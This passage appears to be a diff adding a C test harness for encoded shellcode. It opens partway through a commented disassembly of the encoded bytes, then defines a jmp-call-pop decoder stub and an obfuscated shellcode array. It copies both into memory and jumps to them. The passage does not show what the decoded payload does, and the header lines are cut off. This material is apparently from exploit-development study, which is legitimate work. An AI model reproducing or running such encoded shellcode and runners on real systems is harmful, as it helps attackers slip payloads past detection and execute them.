7f ee jg 80480ae + 80480c0: 62 (bad) + 80480c1: c3 ret + 80480c2: 48 dec eax + 80480c3: 03 d3 add edx,ebx + 80480c5: 8e 76 66 mov ?,WORD PTR [esi+0x66] + 80480c8: 2c 54 sub al,0x54 + 80480ca: 0c 78 or al,0x78 + 80480cc: 05 6a 37 58 e4 add eax,0xe458376a + 80480d1: 8b dc mov ebx,esp + 80480d3: 04 3b add al,0x3b + 80480d5: ce into + 80480d6: b6 4a mov dh,0x4a + 80480d8: af scas eax,DWORD PTR es:[edi] + 80480d9: 53 push ebx + 80480da: 59 pop ecx + 80480db: a6 cmps BYTE PTR ds:[esi],BYTE PTR es:[edi] + 80480dc: b5 05 mov ch,0x5 + 80480de: f7 30 div DWORD PTR [eax] + 80480e0: 15 ea eb 09 9c adc eax,0x9c09ebea + 80480e5: 60 pusha + 80480e6: e4 10 in al,0x10 + 80480e8: 7d cc jge 80480b6 + 80480ea: 56 push esi + 80480eb: cc int3 + 80480ec: aa stos BYTE PTR es:[edi],al +****************************************************/ + +#include +#include +#include + +unsigned char stub[] = \ +"\xeb\x31\x5f\x57\x5e\x8a\x07\x6a\x90\x5b\x3c\xaa\x74\x0a\x30\xd8\x30\x07\x47\x30\x07\x47\xeb\xed\x8d\x3e\x31\xc0\x31\xdb\x8a\x1c\x06\x80\xf3\x90\x75\x12\x8a\x5c\x06\x01\x88\x1f\x47\x04\x02\xeb\xed\xff\xe6\xe8\xca\xff\xff\xff"; + +unsigned char shellcode[] = \ +"\xb7\xcc\x3d\xba\x0a\xab\xf3\xa3\x9b\xbb\x01\x95\x75\xd4\xbc\xf7\xfa\xd9\x1c\x8d\xd5\x1c\xf7\x56\x73\x31\xef\xcd\xa9\x34\x12\x4f\x50\x40\x71\xd0\x94\xc4\xf7\xd7\x7f\xee\x62\xc3\x48\x03\xd3\x8e\x76\x66\x2c\x54\x0c\x78\x05\x6a\x37\x58\xe4\x8b\xdc\x04\x3b\xce\xb6\x4a\xaf\x53\x59\xa6\xb5\x05\xf7\x30\x15\xea\xeb\x09\x9c\x60\xe4\x10\x7d\xcc\x56\xcc\xaa"; + +unsigned char* code; + +main() +{ + printf("\nStub Length: %d\n", strlen(stub)); + printf("Shellcode Length: %d\n\n", strlen(shellcode)); + + printf("Total Length: %d\n\n", strlen(stub) + strlen(shellcode)); + + code = malloc(strlen(stub) + strlen(shellcode)); + memcpy(code, stub, strlen(stub)); + memcpy(&code[strlen(stub)], shellcode, strlen(shellcode)); + + int (*ret)() = (int(*)())code; + + ret(); +} \ No newline at end of file